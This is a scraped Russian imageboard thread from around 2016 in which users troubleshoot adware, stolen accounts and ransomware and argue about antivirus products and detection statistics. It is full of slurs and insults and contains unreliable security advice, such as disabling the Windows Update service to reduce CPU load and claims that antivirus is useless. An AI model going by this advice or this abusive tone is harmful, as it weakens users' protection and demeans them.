Так вот сам вопрос. Может ли это быть косяк со стороны провайдера? Может у них там на серверах эта параша. Потому что блочит вот именно этот сайтец и не основную его часть, а именно бложни.
Через анонимайзер/ проксю или тор заходит нормально.
Нет.
Проверил этот сайтец с телефонки и планшета. Подключался через вайфай, тоже самое, не открываются бложни или показывают письки/другую хуйню. Это даже не реклама, а просто картиночки. Блядь, даже с котиками были.
Скинул роутер к заводским настройкам. Поставил йоба пароль/йоба админку. Проверил. Дело не в роутере.
Так вот сам вопрос. Может ли это быть косяк со стороны провайдера? Может у них там на серверах эта параша. Потому что блочит вот именно этот сайтец и не основную его часть, а именно бложни.
Через анонимайзер/ проксю или тор заходит нормально.
Нет.
>Кому-то из родственников надо накачать хуйни, обмазывались сильно пиратским контентом в первые часы выхода, кому-то надо поставить защиту на чужой компьютер, самые тупые допустили тян или еще какую-нибудь свинью до собственной пеки.
А в гостевую учетку этих пидорасов загнать религия не мозволяет.
мимо
хуево смотрел. открой ебучий вирусбуллетин (который пишут журнашлюхи для широкой аудитории лол) и сделай поиск shadowserver у них по сайту, раз для тебя вирусбуллетин охуеть какой авторитет. хотя понятно что ты просто сливаешься
>Нет.
Почему я не удивлен.
>Может ли это быть косяк со стороны провайдера?
Чисто теоретически может, билайн например для своих мобильных пользователей подменяет трафик.
Но для того, чтобы быть на 100% уверенным, просто кинь блядь сюда линки на странички, которые заменяются.
Сука, пиздец, оно начало открываться. Магия.
Но слава б-гу, а то мне туторы по 3д максу было не посмотреть.
Какая связь-то? Ну ссылаются, и чего? Нет, я как раз о том и писал, что все эти говносайты неавторитетная хуета. Неважно, какеры для какеров, журнашлюхи для журнашлюх, этц.
Авира, аваст или нод32? Больше доверяю последнему, т.к. наименьший шанс шпионажа и прочих телеметрий - хуйня-то платная. Ну и поизвестнее он будет, вроде.
KFA
>KFA
Что?
> шин
> наименьший шанс шпионажа и прочих телеметрий
->
>все эти говносайты неавторитетная хуета
>сообщество профессионал киберсекьюрити
>неавторитетная
Кроме них это кто-нибудь подтверждает? Нет - ссылка на авторитет непроверенного хуесоса.
Что - это?
Таблички с шэдоусервера? Иначе - неподтверждаемость и ссылка на авторитет, то бишь хуета.
>Помнить что виртуалка по дефолту имеет доступ к домашней локалке и айпи хоста. Если собираешься запускать в виртуалке опасные программы, то нужно запретить в фаерволе хоста для виртуалки доступ в локалку 192.168.0.x и подобные подсети.
>Подразумевается что нужно использовать nat-соединение в виртуальном компьютере и на хосте фаерволить именно этот nat-процесс.
Распишие пожалуйста немножко подробнее эти моменты. Доступ к виртуальной локалке и хосту - и что она этим сделает? Спалит айпи других компов в локалке, лол? Или в чем дело? У меня, например, общие папки или вообще драг-н-дроп с локалкой, это плохо? Какие еще подсети запрещать, как вот это вот файрволенье ната осуществлять и что все это даст?
Аноны, хэлп.
Как удалить днс-анлокер, ебаный вирус не получается вообще никак убрать...
Удивляет, что на каких-то сайтах вылетает по миллиону рекламных окон, а на некоторых все ок.
Как удалить днс-анлокер, ебаный вирус не получается вообще никак убрать...
Удивляет, что на каких-то сайтах вылетает по миллиону рекламных окон, а на некоторых все ок.
Все так и есть изначально.
>Таблички с шэдоусервера?
Ну тащемта еще раз повторю, почитай как они проводят тесты, почитай кто эти люди, чем они занимаются и самое главное ДЛЯ КОГО.
Можешь не верить, дело твое, ты не их аудитория.
Ну ты так типа выпендриваешься, да? Я не доверяю нонеймам принципиально, особенно, если нет независимых перекрестных ссылок. Это основной критерий научности любой работы.
>нонеймам
Они нонеймы только для тебя, в узком кругу у них хорошая репутация.
>если нет независимых перекрестных ссылок. Это основной критерий научности любой работы
Какая научность, долбоеб, что за хуйню ты несешь?
>в узком кругу у них хорошая репутация.
Да плевал я на их репутацию, а особенно, на репутацию "в узком кругу".
А то у академиков РАЕН тоже в узком кругу хорошая репутация, у Андреа Росси в узком кругу хорошая репутация... У Лысенко, да даже у Ламарка была хорошая репутация.
>Какая научность, долбоеб, что за хуйню ты несешь?
Ты бы почитал про то, что такое "ссылка на авторитет", раз ты "их аудитория", товарищ сектант.
>Ты бы почитал про то, что такое "ссылка на авторитет", раз ты "их аудитория", товарищ сектант.
Да ты поехавший, еще и в риторику не можешь, тыкаешь другим в логические ошибки, которых нет.
Песню про авторитет ты начал, пролистай тред.
Какое отношение выдуманные академики, которые что-то там "разрабатывают" имеют к сбору данных? Ты ведь не читал нихуя на сайте шэдоусерва, просто несешь хуйню и требуешь каких-то пруфов и перекрестных ссылок.
>Да ты поехавший, еще и в риторику не можешь
Какая, в жопу, риторика?
>Песню про авторитет ты начал, пролистай тред.
Да, ёб твою мать, и ссылка на авторитет - это один из основных приемов распространения и признания лженаучного знания. Типа "Вот Тесла говорит "теория эфира", а Тесла мужик умный, он хуйни не скажет". Так ты не читал трудов выдуманных академиков, они тоже, их послушать, все правильно и умно делают. Только в том и дело - для понимания того, делают они правильно или хуйню, надо послушать других авторитетных людей, разных, об этих первых.
Софтаны, а есть статистика по самым активным антивирусам с вирустотала? Ну т.е. какой чаще других обнаруживает. Чёт я не смог нагуглить.
Kaspersky Free Antivirus
>Сам видел.
Смысл не в том, ты отвечаешь не на ту часть предложения. Ответ нужен вот на это
>в vmware их нет или меньше?
А потом сходи по ссылке https://www.exploit-db.com/search/?action=search&description=vmware
>Я не вижу смысла в антивирусе.
40-60% детекта 0day лучше 0, по ретраям в течении двух дней нормальные конторы детект до 70-80% догоняют.
80% детекта малваря, который впервые обнаружен 2 дня назад - это охуенный результат для тех, кому нужно нормальное юзабилити пекарни без заебов с виртуалками и сэндбоксами.
алсо, коллективный иммунитет, все дела.
>доволен как слон
Доволен тем, что кашперский дает возможность слушать твой https траффик снаружи системы хуй пойми кому?
Ты дурак штоле блядь, какое нахуй научное знание, они скармливают выданным им производителями антивирусам 0day полученные через самих вендоров, и из своих источников, потом каждые джва часа делают ретесты, обновив перед этим базы АВ. Все новые сигнатуры они каждый блджад день отправляют вендорам АВ. Все тесты проводятся в чистом серверном ав без надстроек типа проактивной защиты и прочих свистоперделок.
Ты тупо требуешь пруфов этих данных, которые тебе априори никто не предоставит, потому что всем похуй, потому что они заниимаются этим не для популяризации АВ и не для того, чтобы у тебя была возможность сравнить и выбрать "лучший антивирус", shadowserver не в коньсюмер сегменте.
Вендоры АВ им доверяют, этого мне достаточно.
Господи, какой же ты тупой, блеать!
>Ты тупо требуешь пруфов этих данных, которые тебе априори никто не предоставит
>Вендоры АВ им доверяют, этого мне достаточно
Верун не человек.
>Ты дурак штоле блядь, какое нахуй научное знание
Сколько еще раз тебе надо повторить, что НЕЛЬЗЯ, НЕЛЬЗЯ верить даже самому умному человеку, даже самым убедительным образом и максимально правдоподобно изъясняющемуся, если его слова никем не подтверждены и сам ты проверить (реально) их не можешь. Если тебе завтра сам Наделла скажет, что в КМС Авто - зонд для вебки, ты поверишь? Просто потому, что это сказал Наделла? А это не Наделла, это нонеймы.
И еще, раз уж у тебя такая Вера в авторитеты и идолы: ты так носишься со своими 0day, но даже не зашел на википедию, где в соответствующей статье нет ни одной ссылки на шедоусервер. Знаешь, сколько раз на википедии упоминается шедоусервер? 15. ПЯТНАДЦАТЬ, Карл. Включая саму статью, которая в 2009 году помечена как реклама, а в обсуждении чувак пишет, что его ддосили с этого домена. Это просто обсоски, с которыми ты носишься, как сектант.
https://www.avira.com/ru/avira-free-antivirus#screen-4
Блядь, серьезно? Кажется, между авирой и нодом выбор больше не стоит.
Блядь, серьезно? Кажется, между авирой и нодом выбор больше не стоит.
Да ты поехавший.
Приведу тебе пример для тупых (ок, таких же тупых, как ты, не хочу обижать просто тупеньких).
Вот ты блядь отдаешь еду на экспертизу, например содержания некоторых веществ. Отдаешь в лабораторию. Они проводят экспертизу, и выдают заключение. И что теперь, мне этот же кусок еды надо сдать еще в несколько лабораторий, чтобы получить перекрестные ссылки? Чисто теоретически это так, на практите заключения экспертизы в одной лаборатории верят, пока не доказано обратное. Тут такая же хуйня.
> Включая саму статью, которая в 2009 году помечена как реклама, а в обсуждении чувак пишет, что его ддосили с этого домена. Это просто обсоски, с которыми ты носишься, как сектант.
Ты же читал обсуждение полностью, хули ты маняврируешь, там овердохуя комментов о том, что им можно доверять по референсам.
Про ДДоС это пиздец ваще, пишут ебалаи вроде тебя, почитай еще раз внимательно wiki шэдоусервера, они сканят сеть. Если ты думаешь, что пинг с одного адреса это ДДоС, то с тобой вообще не о чем говорить.
>Они проводят экспертизу, и выдают заключение. И что теперь, мне этот же кусок еды надо сдать еще в несколько лабораторий, чтобы получить перекрестные ссылки? Чисто теоретически это так
У ТЕБЯ ПРОСНУЛСЯ МОЗГ??? ПОЗДРАВЛЯЮ!
>на практите
На чьей практике? На твоей студенческой? В науке проводят перекрестные исследования, в той же медицине, в физике элементарных частиц. В суде постоянно назначают повторные экспертизы. В досудебном урегулировании тем более (после несовпадения результатов как раз идут в суд).
>Ты же читал обсуждение полностью
Видимо, нет. Пруфай.
>они сканят сеть. Если ты думаешь, что пинг с одного адреса
И этот человек еще что-то говорит про маневры.
Касперский блокирует ДВАЧ Аноним (Microsoft Windows 7: Chromium based) 08/03/16 Втр 22:19:12 #268 №1638129
Аноны помогите, у меня касперский начал внезапно блокировать двач, в настройках отключал всё, что можно, но смог зайти на двач только тогда, когда отключил касперский к хуям вообще.
Ты бы для начала его говнорасширение из браузера пидорнул.
А нахуя ты сюда залез? Тут только порнография, маты, моральное разложение, ссылки на вишню и разный варез. Тебя оберегают от негативного влияния.
хотел линкануть вебмку с руОС, но с какого-то хуя 7.5 мегов слишком много
> В науке проводят перекрестные исследования, в той же медицине, в физике элементарных частиц.
Блядь да ты поехавший, при чем тут наука. Температуру дома когда измеряешь тоже с перекрестными ссылками это делаешь?
>В суде постоянно назначают повторные экспертизы
Пруфай
>Пруфай.
Пруфанул за щеку, не проверяй. хотя ты пригласи трех разных экспертов, пусть проведут исследование по двойному слепому методу
Слив засчитан.
>Температуру дома когда измеряешь тоже с перекрестными ссылками это делаешь?
В отличие от рандомных нонейм-хуесосов, ртути можно доверять. Да и то желательно раз в пару лет проверять, не сломался ли градусник, и не стоит ли датчик влажности рядом с увлажнителем или аквариумом.
В любом случае, после
этого говновира может быть хоть топовым антивирусом, пусть сосет.
>ртути можно доверять
Да нет же, нельзя. Только исследование температуры по двойному слепому методу. Иначе не научно. Вдруг у тебя не ртуть там. Может тебя мамка наебать решила когда родила и поменяла градусник.
В отличие от манякукареканий в качестве единственного пруфа - не столь важное знание. А понадобится - зайдешь в прогноз погоды и уточнишь. Покажутся показания недостоверными, купишь еще один градусник. Да, именно так и убеждаются в правоте.
>В отличие от манякукареканий в качестве единственного пруфа - не столь важное знание. А понадобится - зайдешь в реактор и уточнишь. Покажутся показания недостоверными, установишь зону отчуждения, накроешь блоки саркофагом и новую АЭС построишь. Да, именно так и убеждаются в правоте.
Но ведь теперь и у Касперского есть бесплатный антивирус. Лицензия на год, а там хз как будет
Давно снёс и нихуя не помогает
Что еще за Norton (free), блядь? У Нортона нет бесплатной версии. Есть полнофункциональный Free trial, и есть Power eraser - одноразовый сканер без резидентного модуля.
Вот такая хуйня вчера появилась. Он то заходит, то пропадает. Клиент для сетей microsoft и сетевое обнаружение отключены. Сеть частная. На компе стоит антивирус Dr. web.
А теперь внимание вопрос: как убрать этого пидора из сетей?
А теперь внимание вопрос: как убрать этого пидора из сетей?
Ко мне тож пару дней назад ПОСТУЧАЛИСЬ. Всплыло уведомление в авасте, что два других пользователя пытаются запуститься с правами администратора.
Это просто админ днс сервера проверял безопасность
Посоветуйте антивирь на некромашину. Интернета на ней почти не будет (мобильный в ебенях) должен защищать от китайского АНТИВИРУСА и юзера. Алсо от зоопарка троянов в локалке.
avz удалил вирус потом он появился заного Аноним (Microsoft Windows 10: Chromium based) 21/03/16 Пнд 21:25:47 #287 №1650925
Тип залез в комп через мой ип адресс и скинул все что написано в логах, я это все удалил и сегодня появилось все тоже самое. Поможет ли переустановка винды?
Жути вам принёс https://habrahabr.ru/company/ua-hosting/blog/279791/
>вирустотал
>антивирус
Прекрати
Статью не читай, сразу обсирай.
Как бы я узнал что там вирустотал, если бы не читал?
Спасибо всем за помощь - ставлю аваст.
Зачем нужен антивирус эдвенсед юзеру?
Вопрос всем.
Потому что каждый считает себя эдвенседом — мало кому хватит скромности усомниться в своих знаниях. Следовательно, советы им автоматически становятся советами всем и каждому.
Короче, отвечаю сам - антивирус эдвенсед юзеру нинужен.
>антивирус эдвенсед юзеру нинужен
почему? define эдвенсед юзера.
Вот мой выбор. Пока доволен.
Грамотно настроенный фаервол+перепрошитый роутер+сканеры вроде hitmanpro dr.web куреит+скриптблокер в браузере+мозги при сёрфинге.
>скриптблокер в браузере+мозги при сёрфинге.
Этого вполне хватит, я считаю.
Эдвенсед юзер это тот, кто опытен в в использовании своей основной ОС и знает основы компьютерной гигиены.
>Спасибо всем за помощь - ставлю аваст.
Хороший выбор. Все посещения сайтов и запуски програм сливаются бизнес партнерам аваста.
Но ведь использование ав относится к "основам компьютерной гигиены"
Нет.
Кто тебе такое сказал?
Чтобы было чисто достаточно не мусорить, а не содержать уборщика.
Ты не ответил на вопрос.
Логика и здравомыслие подсказали.
Я такое сказал.
А теперь рот себе зашей, животное.
Я не вижу связи между логикой, здравомыслием и отсутствием ав. Будь добр, дай развёрнутый ответ на вопрос.
Если не класть какахи в рот, то не придется колоть антибиотики от подхваченной инфекции. Это и называется ГИГИЕНА.
Сижу без антивирусов года 3. Даже дефендер встроенный привентивно отключён. Зачем они?
Используйте бесплатный касперский (доступен только для России и Украины). Лучший вариант, ибо платить не надо и защищает лучше стандартного от Microsoft.
Это только если маме на комп поставить, чтоб не нахватала всякого, когда будет по интернету искать свои советские комедии без регистрации и смс.
А опытному юзеру нужен скорее норм настроенный фаервол и скриптблокер в браузер. Остальное обеспечит. как тут уже писал выше, мозги и элементарная гигиена. Ну если параноик как я, можешь разх в день на 5 минут запускать куреит веба или какой нибудь другой сканнер. Но онлайн защита от вирусни не нужна человеку с мозгами и фаерволом.
>Ну если параноик
>запускать куреит веба или какой нибудь другой сканнер
Пхех.
Ну тащемта если зонды тебя совсем не беспокоят, можно и касперского конечно, но нахуя когда есть авира\битдефендер?
У тебя логика нарушена, потому что "инфекцию" можно подхватить и от нормальной на вид "еды", а не только от "каках". И вот для таких случаев и нужны АВ. ВНЕЗАПНО.
А долбоебы, считающие что чисто там, где не мусорят, а не там, где убирают, просто долбоебы, потому что не мусорят только там, где людей и жизни нет совсем, а время замерло.
Два чаю этому господину.
Какие все блядь на дриснятке современные стали, сидят под админом без UAC и антивируса.
Я когда на сперме сидел, был под юзером с UAC, настроил групповые политики и поставил Авиру.
Всё что обращалось в сеть запускал в песочнице.
Регулярно обновлял систему.
А эти... ОЙ, НИЧЕГО НИ НУЖНА, МЫ ЖЕ НЕ В 2007)))
Хорошо, применим твою же фимозную логику. Инфекцию можно схватить и при установленном антивирусе. Значит он нинужен.
> А долбоебы, считающие что чисто там, где не мусорят, а не там, где убирают, просто долбоебы, потому что не мусорят только там, где людей и жизни нет совсем, а время замерло.
Это называется КУЛЬТУРА.
Наличие ав увеличивает твои шансы не стать жертвой шифровальщика, значит таки нужно. 100% защиты тебе не даст ни один способ кроме анального эйргэпа.
Я пытаюсь в твою маленькую голову студентотрона одну мысль поселить - убирать в любом случае надо, если есть жизнь. Все твои "покпокпок культура, кококо не ходи по подозрительным сайтам" это хорошо, но только в реальной жизни это не работает потому что 1) доверенные сайты/службы тоже уязвимы 2) юзерам похуй на твои проповеди, они все равно будут делать что им нужно. Люди покупают камплюктер не для того, чтобы не использовать его.
> Наличие ав увеличивает твои шансы не стать жертвой шифровальщика, значит таки нужно. 100% защиты тебе не даст ни один способ кроме анального эйргэпа.
Комп гигиена дает такие же шансы. Если не больше.
> 1) доверенные сайты/службы тоже уязвимы
Это к вопросу о том, что нет абсолютной безопасности, а не к вопросу, нужен ли антивирь или нет. Он кстати тоже может быть дырявым уязвимым.
> юзерам похуй на твои проповеди, они все равно будут делать что им нужно. Люди покупают камплюктер не для того, чтобы не использовать его.
Речь шла про эдвенсед юзеров.
только поставил винду ,по пути sys32\cpldapu\produKey.exe Tool.PassSteel.645 ?если снести то винда по пиде пойдет?И как убрать ?
Win XP 036034
Ребята, вы совсем больные? Какие зонды майкрософта? Кому вы нужны, хикканы недоделанные?
Просто не запускайте exе-файлы.
Удалить flash, java из системы.
Просто не запускайте exе-файлы.
Удалить flash, java из системы.
>Какие зонды майкрософта?
Те, которые ведут кейлоги, делают фото как ты левой дрочишь а правой анус щекочешь, и прикладывают к ним снапшот bssid окружающих вифи сетей?
>Комп гигиена дает такие же шансы
наличие антивируса и твоя "комп гигиена" не взаимоисключают друг друга, прикинь да.
>Это к вопросу о том, что нет абсолютной безопасности, а не к вопросу, нужен ли антивирь или нет.
см ответ на предыдущий вопрос. наличие ав увеличивает твои шансы, значит это хорошо и нужно.
>эдвенсед юзеров
ну и что, эдвансед юзеры по твоему камплюктер пользуют только чтобы в ролики с ютуба пыриться? или ты мне вообще весь софт вообще всегда в сэндбоксе прикажешь запускать, на случай пиздецомы в нем?
> наличие антивируса и твоя "комп гигиена" не взаимоисключают друг друга, прикинь да.
Комп гигиены ДОСТАТОЧНО. Тем более АВ это мокропися из мокропись жрущая цопэ.
> наличие ав увеличивает твои шансы, значит это хорошо и нужно.
На 5 процентов? Не оправдано, нинужно.
> или ты мне вообще весь софт вообще всегда в сэндбоксе прикажешь запускать, на случай пиздецомы в нем?
Я предлагаю эдвенсед юзерам использовать простой комплекс не мокрописечных средств. А не надеяться на мокрописю.
>Доступ к виртуальной локалке и хосту - и что она этим сделает?
Допустим ты случайно запустил зловредную программу в виртуалке. Или виртуалку хакнули. Это программа (или хакер) сможет полазить по твоей локалке. Может даже залезть на роутер на который ты не поставил пароль. Полазить по твоим сетевым дискам с частными документами. Начать взлом твоего хоста по его IP. Хакер/зловред сможет дотянуться до всего что имеет сетевой адрес в локалке.
Ещё проприетарные программы могут начать собирать статистику, информацию о твоей локалке, о компьютерах в локалке и отправлять куда следует (фбр, фсб, полиция, анб, мосоны). Для вашего-же блага. Честным гражданам скрывать нечего.
>ДОСТАТОЧНО
>нет абсолютной безопасности
Сам себе противоречишь, пиздуй в б
>На 5 процентов?
Разница детекта 0day между авирой-хуирой и виндефом 20%. Разница по ретраям за 48 часов 30%. Этого достаточно.
>простой комплекс не мокрописечных средств
Лолблядь.
Не знаешь разницы в словах ДОСТАТОЧНО и АБСОЛЮТНО? Пиздуй в школу.
> Разница детекта 0day между авирой-хуирой и виндефом 20%. Разница по ретраям за 48 часов 30%. Этого достаточно.
Ссылку на исследование пожалуйста.
> Лолблядь.
Хуёлблядь
https://www.shadowserver.org/wiki/pmwiki.php/AV/Virus90-DayStats
>Не знаешь разницы в словах ДОСТАТОЧНО и АБСОЛЮТНО?
Ссылочку на достаточность своих методов предоставь.
> https://www.shadowserver.org/wiki/pmwiki.php/AV/Virus90-DayStats
Что это за хуета? Там не исследование
> Ссылочку на достаточность своих методов предоставь.
После тебя
А что там?
>после тебя
Ты мне предлагаешь пруфать недостаточность твоих "методов" при том, что ты даже не уточнил что это за методы? А не пойти ли тебе на хуй?
Может немного не в тот тред, но у меня вопрос.
Я еблан и установил как-то Space Sound Pro (может проблема именно в нём в том числе). Постоянно выскакивает реклама и прочая хуйня. И ещё одна проблема - размер жёсткого диска постоянно на глазах уменьшается. 930 гб, в торренте ничего не загружается. Был какой-то антивирус, но в итоге хуйня какая-то получилась. Что делать вообще-то?
Я еблан и установил как-то Space Sound Pro (может проблема именно в нём в том числе). Постоянно выскакивает реклама и прочая хуйня. И ещё одна проблема - размер жёсткого диска постоянно на глазах уменьшается. 930 гб, в торренте ничего не загружается. Был какой-то антивирус, но в итоге хуйня какая-то получилась. Что делать вообще-то?
Тред не читал, сорри, ибо очень много букв. Прошу помощи. Трабл: последнее обновление Comodo IS (25.03.16) прошло как-то не очень гладко. При запуске винды ХР антивирус не стартует, пишет ошибку, что не найдена точка входа в cistray.exe. Танцы с бубном не помогают. При этом какие-либо процессы в диспетчере не идут, в трее значка нет, но удалить себя не позволяет, вешая систему. Кто-нибудь сталкивался с таким?
Никто тебе не поможет. Пробуй
https://forums.comodo.com/install-setup-configuration-faq-cis/forced-uninstaller-tools-t95115.0.html
1. Please make sure you have saved any unsaved work and preferably backed up your computer first
2. Unzip the file to a hard disk directory of your choice
3. Add the file to CIS Trusted Files using Advanced settings ~ File Rating Trusted Files ~ Add.
4. Run the file by double clicking on it run options one, two and three in sequence.
It should not be necessary to run it from Windows Safe Mode, but you can if you wish to be sure.
CIS 5.x
The original uninstaller tool for CIS 5.x and some versions of other CIS products can be found: here.
https://forums.comodo.com/install-setup-configuration-faq-cis/uninstaller-tool-for-comodo-products-inc-cis-v5-t71897.0.html
Я скажу так, ставишь виртуалку и накатываешь на нее OpenBSD. ставишь фаервол - настраиваешь его, И ЕБЕШЬ ВСЕ И ВСЯ. Все вирусы будут отсасывать.
>Все вирусы будут отсасывать.
И ты вместе с ними.
Как узнал?
Что ты левой дрочишь а правой анус щекочешь? Баллмер сообщил.
Парни, у кого есть пак работоспособных вирусов? Да желательно посвежее, хочу потестить БЕСПЛАТНЫЕ АНТИВИРУСЫ.
Кстати какие вы антивирусные реаниматоры используете? Я вот avg юзаю, вроде норм.
Спасибо
Уебывай школяр
> Кстати какие вы антивирусные реаниматоры используете? Я вот avg юзаю, вроде норм.
libruki.so, libbrain.so.1, vmlinuz. Базарю, помогают на 110%.
И вообще, весь тред меня насмешил. Какие-то адвансед юзеры, которые должны ставить антивиросы, ИБО НЕХУЙ! Вообще охуеть.
Поймать ВИРОС в 2016 году, Карл! Поймать вирос! Пиздец короче, соска превратилась в филиальчик ответов.мэйл.сру
Ты что думаешь, мы тут вирусы разводим? Наслаждайся.
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=308
Помогло хоть?
Что думаете про запуск браузера в контейнере, например докер? Это же должно защитить от какого-нибудь зеродея браузерного, от которого ни антивирус ни руки прямые ни common sense 2016(tm) не помогут.
> Это же должно защитить от какого-нибудь зеродея браузерного
Но не защитит от зиродея докерного и будет тормозить и так не самые щадящие по пожиранию ресурсов пекарни современные жирнючие браузерыричвеб-комбайны
Слишком толсто, попробуй потоньше
Предлагаю тебе воспринимать весь камплюктер как один большой контейнер, а все критичные данные сливать в облако.
Вообще я умею обеими руками дрочить и анус не щекочу.
Все правильно он сказал.
Но ведь этот прав. На опенке флеша нет, а html5 через жопу работает с тормозами. В чем смысл браузера в 2016, если он в потоковое видео не умеет?
> TPM
> Бдит
Чего ещё раскажешь?
C позволения модера, репостну из шиндоус-треда сюда.
Короче пацаны, на вас надеюсь очень.
Совсем недавно, мне стали приходить СМСки на мобилку с одноклассников - мол вот ваш код подтверждения. До сих пор приходят. Притом, что на ок.ру у меня лишь фейк, причем довольно старый, без какой-либо инфы, никому не нужный.
Потом, стали приходить те же СМСки и с вк. Я быстренько сменил пароль, все устаканилось.
А потом, блядь, у меня спиздили аккаунт со Стима, и угнали два акка League Of Legends. Причем, как спиздили акк стима я понятия не имею. Ну т.е., они сменили мыло на другое, но мое мыло осталось не взломанным. Стимоакк я быстренько восстановил, а на акки лольца мне в принципе похуй, хотя они даже, вроде как, к мылу не привязаны. Или я были привязаны, а я и не помню.
Вот такие дела, в общем. Я в ахуе, если честно.
Еще одна херь появилась до этих все событий - когда я стал запускать YouCam, она мне говорила что доступа к вебке нет, так как она занята другим приложением. Естественно, ни чем другим она не могла быть занята.
Так вот, проверил комп через Авиру и АВЗ - офк, нихуя не нашлось в принципе. Ну что-то нашлось, но какая-то херь вроде плагинов к FL Studio вроде бы вредоносных и т.п.
Я честно, не знаю с чем это все связано, потому что я элементарно почти ничего не скачиваю кроме музыки в архивах, или ромчиков к приставкам. Вебка, кстати говоря, до сих пор не доступна.
Как быть в такой ситуации? Как вылечиться и обезопасить себя?
Короче пацаны, на вас надеюсь очень.
Совсем недавно, мне стали приходить СМСки на мобилку с одноклассников - мол вот ваш код подтверждения. До сих пор приходят. Притом, что на ок.ру у меня лишь фейк, причем довольно старый, без какой-либо инфы, никому не нужный.
Потом, стали приходить те же СМСки и с вк. Я быстренько сменил пароль, все устаканилось.
А потом, блядь, у меня спиздили аккаунт со Стима, и угнали два акка League Of Legends. Причем, как спиздили акк стима я понятия не имею. Ну т.е., они сменили мыло на другое, но мое мыло осталось не взломанным. Стимоакк я быстренько восстановил, а на акки лольца мне в принципе похуй, хотя они даже, вроде как, к мылу не привязаны. Или я были привязаны, а я и не помню.
Вот такие дела, в общем. Я в ахуе, если честно.
Еще одна херь появилась до этих все событий - когда я стал запускать YouCam, она мне говорила что доступа к вебке нет, так как она занята другим приложением. Естественно, ни чем другим она не могла быть занята.
Так вот, проверил комп через Авиру и АВЗ - офк, нихуя не нашлось в принципе. Ну что-то нашлось, но какая-то херь вроде плагинов к FL Studio вроде бы вредоносных и т.п.
Я честно, не знаю с чем это все связано, потому что я элементарно почти ничего не скачиваю кроме музыки в архивах, или ромчиков к приставкам. Вебка, кстати говоря, до сих пор не доступна.
Как быть в такой ситуации? Как вылечиться и обезопасить себя?
> Яндекс браузер
> Russische gaymer
> АВЗ
Как будто ты умеешь им пользоваться. Это не сканер, а инструмент. С ним надо идти на вирусинфо, делать логи, и показывать хелперу, если сам не можешь. Это способ вылечиться.
А способа обезопасить себя у тебя нет. Если допустил один раз, допустишь снова. Это надо вникать, интересоваться, читать специализированные форумы.
Грубо говоря это выглядит так: Настраиваешь винду, отключаешь ненужные службы, удаляешь и больше никогда не устанавливаешь потенциально уязвимые программы, как java, сильверлайт, адоб ридеры, и даже флэши. Жестко настраиваешь фаервол, вручную прописывая правила для трех с половиной нужных тебе программ, после чего переводишь его в режим блокировки, и что бы ни просилось в интернет, ты даже уведомлений об этом не получаешь. Настраиваешь браузер (не яндекс), отключаешь в нем все плагины, устанавливаешь три с половиной аддона для большей безопасности. Только самое необходимое и ничего лишнего. В них глобально блокируешь кукисы, скрипты, и разрешаешь вручную только на нужных тебе сайтах. Делаешь over 9000 тонких настроек, но хромобраузеры в это не могут, так что забудь. В винде тоже отключаешь все, чем не пользуешься. Время от времени устанавливаешь все обновления безопасности. Привыкаешь в ограничениям. Не можешь уже без них жить.
Можешь какой-то антивирус себе поставить, если тебе от этого станет легче. Но и он тебя не спасет без настройки системы.
Если тебе это не подходит, тогда сюда: http://button.dekel.ru/
Реально ли дешифровать файлы после вируса better call saul?
Пиши заявление в полицию и надейся.
Все еще слишком толсто
Я думаю хитрые какеры перехватили управление твоей вебкой через intelme и спиздили пассы просто рассмотрев отражение в твоих зрачках.
>поймал шифровальщика
>Пиши заявление в полицию
топовый совет, почти на уровне >2016 >антивирусы
Ну а раз никто не жалуется, то никто с кибер-преступниками и бороться не будет. Крепчайте и получайте удовольствие.
Расшифровки этой модификации еще нет, и может и не будет никогда.
>раз никто не жалуется, то никто с кибер-преступниками и бороться не будет
конечно, а так ты напишешь заявление а менты возьмут и оторвут жопы от кресел, и вместо того, чтобы план по посадкам выполнять через распространителей порнухи вконтакте будут реально работать, проведут аналитическую работу по всем движениям битков на кошельке, найдут официалов, продающих товары за битки и через запросы им выйдут на мамкиного хакера из педаруси, а потом им дадут денег на коммандировку и они совместно с минским отрядом спецназа выставят дверь мамкиному хакриу егорке. Ты так себе это представляешь?
Я никак не представляю. А не записанное не наблюдалось. Нет заявления - нет преступления. Значит твои файлы целы и претензий у тебя нет, все. Твоя хата с краю.
Случаи посадки хацкеров были. Менты зарплату получают. И заявление они принять обязаны. А что они будут с этим делать это их проблемы. Есть мнение, что в стол не ляжет в любом случае. А вот когда поймают и дойдет ли дело до суда - тут хз.
>Случаи посадки хацкеров были
Это не те случаи были, и сажали их не потому, что на кулхацкера менеджер среднего звена иван написал заяву.
И да, правда ли, что линуксу похую на вирусы, включая тот же better call saul? Хотя бы потому что вирусы пишут под винду в основном? И что думаете про BSD?
Правда, но только потому, что весь софт качается только из репозиториев/на крайний случай в исходниках.
>что весь софт качается...
...с официальных сайтов минт и трансмишн...бгг...
>И что думаете про BSD?
Пока вирус компилируется пользователь успевает уже сам наебнуть систему.
Школьник в треде. Не знаю, где спросить: здесь или в железе. Спрошу тут.
Постоянная нагрузка на цп от svchost.exe около 50-80 процентов. Почитал в интернете, вроде, расположение экзешников нормальное.
Стоит семёрка, железо прилагаю. Это нормально ситуация? Соответсвует железу? Руткиты? Я в ботнете?
С антивирусами в треде, я так понимаю не разобрались пока окончательно? У меня AVG с их фаерволлом. Ничего не делал с настройкой видовского фаервола - я дурной?
Что значат эти логи в avz? (лог пока без скана дисков)
Существует куча "чистилок" компа от всякой дряни - какую посоветуете? Или это всё фейк и хуйня в стиле "сделать хорошо"? Вроде, некоторое время видел что-то подобное в местном факе; запустил, слетели дрова, ещё что-то, откатил;
Спасибо.
Постоянная нагрузка на цп от svchost.exe около 50-80 процентов. Почитал в интернете, вроде, расположение экзешников нормальное.
Стоит семёрка, железо прилагаю. Это нормально ситуация? Соответсвует железу? Руткиты? Я в ботнете?
С антивирусами в треде, я так понимаю не разобрались пока окончательно? У меня AVG с их фаерволлом. Ничего не делал с настройкой видовского фаервола - я дурной?
Что значат эти логи в avz? (лог пока без скана дисков)
Существует куча "чистилок" компа от всякой дряни - какую посоветуете? Или это всё фейк и хуйня в стиле "сделать хорошо"? Вроде, некоторое время видел что-то подобное в местном факе; запустил, слетели дрова, ещё что-то, откатил;
Спасибо.
>Существует куча "чистилок" компа от всякой дряни - какую посоветуете?
Программу переустановки Windows.
Отключи в службах центр обновления. И останови службу. Доложишь о результатах.
Спасибо, заметно помогло.
Об остальных красных пометках от avz стоит беспокоиться?
Ниет. Наличие резидентного антивиря и хаспа в любом случае вызовет эти пометки.
